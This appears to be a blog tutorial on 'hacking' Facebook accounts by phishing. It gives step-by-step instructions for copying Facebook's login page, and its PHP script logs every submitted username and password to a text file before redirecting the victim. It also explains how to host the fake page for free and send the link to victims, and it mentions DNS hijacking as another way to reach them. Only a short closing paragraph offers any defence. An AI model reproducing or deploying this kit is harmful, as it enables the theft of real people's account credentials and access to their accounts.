Hello !!!
I will talk a little of what i know about face book hacking though I will teach
just one easy way to hack face book emails and passwords.
Most people especially the curious ones ask me How can i hack?, Can i hack a bank and most of all, I am asked this question repeatedly: "How can i hack Facebook"?
Here are some methods you may use to hack Facebook password:
1. Facebook phishing
2. Key logging
3. Facebook new features
4. Browser extensions and add-ons
5. Man in the middel attack
Among others
However, For this particular publication, i will go through the method with a great success and very easy to use.
This is: Facebook phishing.
I would like to give u a direct link to some of the phishing pages I made but i also thought u would find it interesting to learn how to make one yourself.
Here is a video live from my YouTube channel. You may want to watch it to get a more clear preview of creating and using of Phisher pages
Hear are the Steps:
1.go to “ www.facebook.com“
2.At the menu bar, go to file- then click save page as.
3.save the page as login.html
4.Go to the saved file and open it in note pad.
5.Press ctrl+f. and find the word “action=” and change its value to hck.php i.e. action=hck.php
6.Open notepad and paste the following then save as “hck.php”
header ('Location: http://www.facebook.com');
$handle = fopen("pwd.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
fwrite($handle, "\r\n");
7.Open a blank notepad and save it as pwd.txt
And there you have a fake login page.
Now. This is the way you are going to make it work.
1.Create an ID/sigh up for a free web hosting account
I recommend www.000webhost.com or read top my top 5 best web hosts from my blog: ClickHere
2.Upload all the files we created “login.html,hck.php and pwd.txt into a directory in a free webhosting account.
You already have a functioning phisher page.
To test this, Find the link to your login.html page and open its link then fill in the
Username and password, then go to your free website and :::bang::: you have the user name and pass word to your victim.
Now if you want to hack someone, just send them this link so that when thy fill there user names and password, By the way,You could just hack the DNS or just insert it in as a home page for your victims
After your Victim uses it,you will get The password and user name on your free host website in the pawd file you uploaded.
How to avoid being hacked by a phisheris rely easy. Just make sure you don’t log into facebook unless it’s address bar is www.facebook.com. If there is any thing more than that, then it is a phisher for sure. I'll also recommend always using the F5 button or just remember to refresh the page before you log into a public network.
Name is Elit Peter (Bampeire)
Hacking is a crime and I wont be responsible for your actions